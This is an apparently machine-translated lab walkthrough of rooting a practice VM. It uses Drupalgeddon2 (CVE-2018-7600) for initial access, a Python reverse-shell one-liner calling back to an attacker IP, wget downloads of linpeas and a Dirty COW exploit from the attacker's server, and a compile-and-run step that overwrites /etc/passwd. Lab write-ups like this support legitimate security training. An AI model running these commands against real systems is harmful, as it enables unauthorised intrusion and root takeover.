Infiltrate ideas ：

nmap Scan the discovery port ,robots.txt as well as Drupal Approximate version ---- adopt CHANGELOG Further confirmation Drupal edition ---- utilize Drupal 7 Of RCE(CVE-2018-7600)getshell（ No certification required ）---- obtain python rebound shell ---- The right of a dirty cow

environmental information ：

Drone aircraft ：192.168.101.89

attack ：192.168.101.34

Specific steps ：

1、nmap scanning

sudo nmap -sV -sC -p- 192.168.101.89

Scan to TCP 22（ssh）、80、1898（http） port , It also identifies 1898 The port uses Drupal 7, It is also found that robots.txt

2、 adopt CHANGELOG Further confirmation Drupal edition

Browser access http://192.168.101.89:1898/robots.txt, Find out Disallow There are /CHANGELOG.txt

visit http://192.168.101.89:1898/CHANGELOG.txt, Discover the present Drupal Version should be 7.54

3、 utilize Drupal 7 Of RCE(CVE-2018-7600)getshell（ No certification required ）

exploit-db Mid search drupal 7, Eliminate the need for certification exp, According to the exp Utilized url Whether access locking does not require authentication RCE：“Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution”

Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution - PHP webapps Exploit

take exp（44449.rb） download , Comment out “require 'highline/import'”（ Because it didn't work , And if it is not commented out, an error will be reported ）, Others are not modified

Execute on the command line

ruby 44449.rb http://192.168.101.89:1898/

Get the target www-data User shell

4、 obtain python rebound shell

Unfortunately, the above shell Cannot switch directories , So consider using rebound shell Command to get another bounce shell

And because of this shell Cannot redirect in （>）, So use a that does not contain redirection symbols python Statement to get bounce shell

First attack the aircraft nc monitor 8888 port

nc -nlvp 8888

Then I got it in the previous step shell In the implementation of

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.101.34",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

You can get the target www-data User's rebound shell

5、 The right of a dirty cow

On the attack plane linpeas.sh From the folder http service

python2 -m SimpleHTTPServer 80

Execute the following commands on the target , Download from the attacker linpeas.sh, Add executable rights , And implement

wget http://192.168.101.34/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

linpeas.sh Identify high-risk kernel versions Linux version 4.4.0-31-generic

And give a few that are likely to succeed in raising rights exp, After trying one by one , Find out dirtycow Of exp（https://www.exploit-db.com/download/40847） Well done

take exp 40847.cpp Download to the attacker , Then execute the following commands on the target , Download from the attacker 40847.cpp, compile , Give executable permission and execute

wget http://192.168.101.34/40847.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
chmod +x dcow
./dcow

Prompt after execution ：Root password is: dirtyCowFun

Indicates that the attack was successful , Now you can su To root, The password for dirtyCowFun

get root Of shell after , stay /root You can find flag.txt

Digression ：

1、40847.cpp Will be in /etc/passwd write in root New password for , And the original /etc/passwd Backed up as /etc/passwd-

2、 About dirty cattle

Website ：Dirty COW (CVE-2016-5195)

poc Set ：PoCs · dirtycow/dirtycow.github.io Wiki · GitHub